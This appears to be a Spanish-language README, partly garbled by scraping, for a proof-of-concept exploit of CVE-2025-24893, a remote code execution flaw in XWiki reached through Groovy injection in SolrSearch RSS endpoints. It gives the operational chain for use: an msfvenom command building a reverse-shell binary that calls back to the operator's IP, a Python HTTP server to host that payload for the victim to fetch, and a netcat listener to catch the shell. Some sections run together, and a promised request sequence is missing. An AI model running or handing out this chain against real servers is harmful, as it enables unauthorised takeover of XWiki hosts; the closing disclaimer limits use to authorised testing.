
PoC explota CVE-2025-24893 , una vulnerabilidad de ejecución remota de código (RCE) en XWiki causada por un sandboxing incorrecto en macros Groovy renderizadas de forma asíncrona. Permite la ejecución arbitraria de comandos mediante inyección en endpoints SolrSearch basados en RSS.
Este script de Python explota CVE-2025-24893, una vulnerabilidad de ejecución remota de código (RCE) en XWiki causada por un sandboxing inadecuado en macros de Groovy renderizadas de forma asíncrona. Permite la ejecución arbitraria de comandos mediante inyección en endpoints de SolrSearch basados en RSS.
msfvenom)Clona o descarga el script.
Asegúrate de tener instalado lo siguiente:
msfvenom de Metasploitjq (usado en los payloads bash)Ejecuta el script:
python3 CVE-2025-24893-PoC.py
Selecciona del menú:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<beacon_port> -f elf -o rev
python3 -m http.server 8080
nc -lvnp 31337
El script envía la siguiente secuencia al objetivo:
Esta herramienta es solo para fines educativos y de pruebas autorizadas. El uso no autorizado contra sistemas que no poseas o para los que no tengas permiso explícito para probar es ilegal y poco ético.